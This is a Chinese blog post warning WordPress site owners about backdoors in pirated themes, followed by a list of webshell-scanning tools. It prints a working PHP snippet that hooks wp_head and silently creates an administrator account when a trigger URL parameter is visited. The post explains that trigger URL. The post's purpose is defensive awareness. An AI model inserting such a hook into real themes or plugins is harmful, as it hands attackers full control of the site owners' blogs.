Dragon
  爱护资源请勿在线解压,禁止任何形式在线解压!即日起发现在线解压一律封号!保存在自己盘也禁止在线解压!那样会导致这个资源全部失效!害人害己!
BOBOBOBO  2021-12-30 14:48 源码之家 隐藏边栏 |   抢沙发  7 
文章评分 0 次,平均分 0.0

作为一个小博主,对于博客的后门代码肯定是深恶痛绝的,尤其是在建站初期,因为一些原因而使用非正版主题,很容易出现这个问题,而往往一些不良的代码贩子,总喜欢给自己贩卖的主题等源代码贴上完美破解、无后门等标签来吸引小博主购买,实际上里面不知道加了多少料,最常见的代码如下:

<span class="pln">add_action</span><span class="pun">(</span><span class="str">'wp_head'</span><span class="pun">,</span> <span class="str">'creatbackdoor'</span><span class="pun">);</span>
<span class="kwd">function</span><span class="pln"> creatbackdoor</span><span class="pun">()</span> <span class="pun">{</span>
        <span class="typ">If</span> <span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'backdoor'</span><span class="pun">]</span> <span class="pun">==</span> <span class="str">'go'</span><span class="pun">)</span> <span class="pun">{</span>
                <span class="kwd">require</span><span class="pun">(</span><span class="str">'wp-includes/registration.php'</span><span class="pun">);</span>
                <span class="typ">If</span> <span class="pun">(!</span><span class="pln">username_exists</span><span class="pun">(</span><span class="str">'username'</span><span class="pun">))</span> <span class="pun">{</span><span class="pln">
                        $user_id </span><span class="pun">=</span><span class="pln"> wp_create_user</span><span class="pun">(</span><span class="str">'username'</span><span class="pun">,</span> <span class="str">'password'</span><span class="pun">);</span><span class="pln">
                        $user </span><span class="pun">=</span> <span class="kwd">new</span><span class="pln"> WP_User</span><span class="pun">(</span><span class="pln">$user_id</span><span class="pun">);</span><span class="pln">
                        $user</span><span class="pun">-></span><span class="pln">set_role</span><span class="pun">(</span><span class="str">'administrator'</span><span class="pun">);</span>
                <span class="pun">}</span>
        <span class="pun">}</span>
<span class="pun">}</span>

将 username 和 password 分别为创建的管理员用户名和密码,所创建的后门地址为:www.yourwebsite.com/?backdoor=go,然后就可以为所欲为了!

当然,后门代码还有很多种,有一些还会经过特殊加密,比如有时候会出现类似 34d1f91fb2e514b8576fab1a75a89a6b 这种乱码,基本就可以断定你的这个主题包加了东西!所以文字咖建议小白博主,这在购买主题或者插件时,尽量不要购买有加密代码的源码,之前网上流传的号称完美破解版的 justnews_5.2.3 和 ripro_4.8 主题基本都有这种肮脏的代码,导致很多小博主的博客数据全丢!

网站源码后门木马查杀工具推荐,建站必备

对于非科班出生的小博主,文字咖这里推荐几个网站后门查杀工具

1. 在线扫描

1) 河马在线查杀:http://n.shellpub.com

这个比较方便,支持 zip 文件压缩包直接上传扫描,当然上传的文件大小不能超过 20MB ,同时支持 asp/php/aspx/jsp/perl 等各种脚本。

2) 百度在线查杀:https://scanner.baidu.com

这个比较厉害,支持 zip、rar、tar 等各种常见压缩包,同时支持 php/jsp/asp/aspx 等各种脚本,也支持通过 API 方式进行扫描,文字咖之前一直使用这个,就是速度有点慢。。。

2) CHIP 在线查杀:https://phpchip.com

这个仅支持 PHP 且只能上传单个 PHP 文件进行扫描。

4) 在线 webshell 查杀-灭绝师太版:http://tools.bugscaner.com/killwebshell/

这个目前支持 zip 或 php 文件上传扫描,但是 zip 压缩包大小不能超过 2M。

2. 客户端扫描

1) 河马查杀

河马同时支持 Windows 和 Linux 两种客户端查杀工具,这里有个比较有意思的地方就是,河马查杀新增了一个机器学习查杀引擎,只是目前处于试验阶段,感兴趣的小伙伴可以去体验一下!

2) D 盾防火墙(强烈推荐)

文字咖最喜欢用的就是这个,可以直接在 Windows 的环境下,使用 D 盾将网站源码或疑似木马文件下载回本地扫描,非常快捷方便。

3) WebShellKiller

大名鼎鼎的深信服发布 webshell 查杀工具,也可以在 Windows 环境下直接选择需要扫描的文件夹开始扫描即可,也是非常方便好用的 webshell 查杀工具。

3. 总结

虽然文字咖在这里推荐了几种网站后门查杀工具,但对于那些以正规建站为目的,希望能够做大站长的同学,还是尽量购买正版主题。当然对于那些喜欢折腾的小伙伴,尽量使用非加密的的主题,毕竟某宝等平台上出售的非正版源码存在安全问题的可能性是非常大的,最后总结就是,遇到一些乱码的源码主题不用,多学习,觉得有安全问题就是用文字咖推荐的几种查杀工具检查一下!

「点点赞赏,手留余香」

还没有人赞赏,快来当第一个赞赏的人吧!

本文为原创文章,版权归所有,欢迎分享本文,转载请保留出处!

BOBO
BOBO 关注:0    粉丝:0
这个人很懒,什么都没写

发表评论

扫一扫二维码分享
Tips:爱护资源请勿在线解压,禁止任何形式在线解压!包括不限制于保存自己盘也绝对禁止在线解压!本站默认解压密码heimacc.com,绝大部分用的分压压缩,需要全部下载才能解压。